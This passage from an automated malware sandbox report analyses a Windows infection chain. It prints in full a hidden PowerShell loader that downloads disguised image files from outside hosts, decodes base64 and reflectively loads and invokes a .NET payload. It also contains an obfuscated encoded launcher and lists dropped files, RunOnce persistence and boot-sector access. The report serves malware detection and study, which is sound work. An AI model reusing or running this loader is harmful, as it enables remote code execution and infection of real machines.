'<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZwBm@Gc@Z@Bm@GY@ZgBm@GY@ZgBm@GY@ZgBm@GY@Zw@v@Gc@Z@Bm@Gc@Z@Bm@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@CJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                            Source: MnzBi21FK.exe.9.drStatic PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00450334 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_00450334
                            Source: soft.exeStatic PE information: section name: .symtab
                            Source: is-PEPS4.tmp.12.drStatic PE information: section name: /4
                            Source: is-PEPS4.tmp.12.drStatic PE information: section name: /19
                            Source: is-PEPS4.tmp.12.drStatic PE information: section name: /35
                            Source: is-PEPS4.tmp.12.drStatic PE information: section name: /51
                            Source: is-PEPS4.tmp.12.drStatic PE information: section name: /63
                            Source: is-PEPS4.tmp.12.drStatic PE information: section name: /77
                            Source: is-PEPS4.tmp.12.drStatic PE information: section name: /89
                            Source: is-PEPS4.tmp.12.drStatic PE information: section name: /102
                            Source: is-PEPS4.tmp.12.drStatic PE information: section name: /113
                            Source: is-PEPS4.tmp.12.drStatic PE information: section name: /124
                            Source: sqlite3.dll.13.drStatic PE information: section name: /4
                            Source: sqlite3.dll.13.drStatic PE information: section name: /19
                            Source: sqlite3.dll.13.drStatic PE information: section name: /35
                            Source: sqlite3.dll.13.drStatic PE information: section name: /51
                            Source: sqlite3.dll.13.drStatic PE information: section name: /63
                            Source: sqlite3.dll.13.drStatic PE information: section name: /77
                            Source: sqlite3.dll.13.drStatic PE information: section name: /89
                            Source: sqlite3.dll.13.drStatic PE information: section name: /102
                            Source: sqlite3.dll.13.drStatic PE information: section name: /113
                            Source: sqlite3.dll.13.drStatic PE information: section name: /124
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: 11_2_004065C8 push 00406605h; ret 11_2_004065FD
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: 11_2_004040B5 push eax; ret 11_2_004040F1
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: 11_2_00408104 push ecx; mov dword ptr [esp], eax11_2_00408109
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: 11_2_00404185 push 00404391h; ret 11_2_00404389
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: 11_2_00404206 push 00404391h; ret 11_2_00404389
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: 11_2_0040C218 push eax; ret 11_2_0040C219
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: 11_2_004042E8 push 00404391h; ret 11_2_00404389
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: 11_2_00404283 push 00404391h; ret 11_2_00404389
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: 11_2_00408F38 push 00408F6Bh; ret 11_2_00408F63
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004849F4 push 00484B02h; ret 12_2_00484AFA
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0040995C push 00409999h; ret 12_2_00409991
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00458060 push 00458098h; ret 12_2_00458090
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004860E4 push ecx; mov dword ptr [esp], ecx12_2_004860E9
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004062C4 push ecx; mov dword ptr [esp], eax12_2_004062C5
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004783C8 push ecx; mov dword ptr [esp], edx12_2_004783C9
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004104F0 push ecx; mov dword ptr [esp], edx12_2_004104F5
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00412938 push 0041299Bh; ret 12_2_00412993
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0049AD44 pushad ; retf 12_2_0049AD53
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0040CE48 push ecx; mov dword ptr [esp], edx12_2_0040CE4A
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00459378 push 004593BCh; ret 12_2_004593B4
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0040F3A8 push ecx; mov dword ptr [esp], edx12_2_0040F3AA
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0040546D push eax; ret 12_2_004054A9
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004434B4 push ecx; mov dword ptr [esp], ecx12_2_004434B8
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0040553D push 00405749h; ret 12_2_00405741
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004055BE push 00405749h; ret 12_2_00405741
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0040563B push 00405749h; ret 12_2_00405741
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004056A0 push 00405749h; ret 12_2_00405741
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0045186C push 0045189Fh; ret 12_2_00451897
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00451A30 push ecx; mov dword ptr [esp], eax12_2_00451A35
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00495BE4 push ecx; mov dword ptr [esp], ecx12_2_00495BE9
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00419C38 push ecx; mov dword ptr [esp], ecx12_2_00419C3D
                            Source: is-HP0G4.tmp.12.drStatic PE information: section name: .text entropy: 6.90903234258047

                            Persistence and Installation Behavior

                            barindex
                            Contains functionality to infect the boot sector
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive013_2_02B9E8BD
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2GK0P.tmp\_isetup\_iscrypt.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-1LUFJ.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\uninstall\unins000.exe (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeFile created: C:\ProgramData\SSDToolBox\SSDToolBox.exeJump to dropped file
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeJump to dropped file
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\UNIQTWO[1].fileJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-TUAE9.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeFile created: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\libGLESv2.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2GK0P.tmp\_isetup\_shfoldr.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-DUVGJ.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\libEGL.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\uninstall\is-SDRVH.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\sqlite3.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-MMTOB.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\msvcp100.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-PEPS4.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-AN5KL.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-21QH6.tmpJump to dropped file
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\UNIQ[1].fileJump to dropped file
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeFile created: C:\ProgramData\SSDToolBox\sqlite3.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\icuin51.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\msvcr100.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-HP0G4.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2GK0P.tmp\_isetup\_setup64.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\Qt5PrintSupport.dll (copy)Jump to dropped file
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\Qt5Concurrent.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\is-SE3Q7.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\icuuc51.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeFile created: C:\ProgramData\SSDToolBox\SSDToolBox.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeFile created: C:\ProgramData\SSDToolBox\sqlite3.dllJump to dropped file
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\UNIQTWO[1].fileJump to dropped file
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\UNIQ[1].fileJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E1684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,14_2_00007FF7444E1684

                            Boot Survival

                            barindex
                            Contains functionality to infect the boot sector
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive013_2_02B9E8BD
                            Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\ConfigJump to behavior
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_00401C5C StartServiceCtrlDispatcherA,13_2_00401C5C
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,12_2_00423C1C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,12_2_00423C1C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004241EC IsIconic,SetActiveWindow,SetFocus,12_2_004241EC
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004241A4 IsIconic,SetActiveWindow,12_2_004241A4
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,12_2_00418394
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004843A8 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,12_2_004843A8
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,12_2_0042286C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0042F2F0 IsIconic,GetWindowLongA,GetWindowLongA,GetActiveWindow,MessageBoxA,SetActiveWindow,GetActiveWindow,MessageBoxA,SetActiveWindow,12_2_0042F2F0
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004175A8 IsIconic,GetCapture,12_2_004175A8
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00417CDE IsIconic,SetWindowPos,12_2_00417CDE
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,12_2_00417CE0
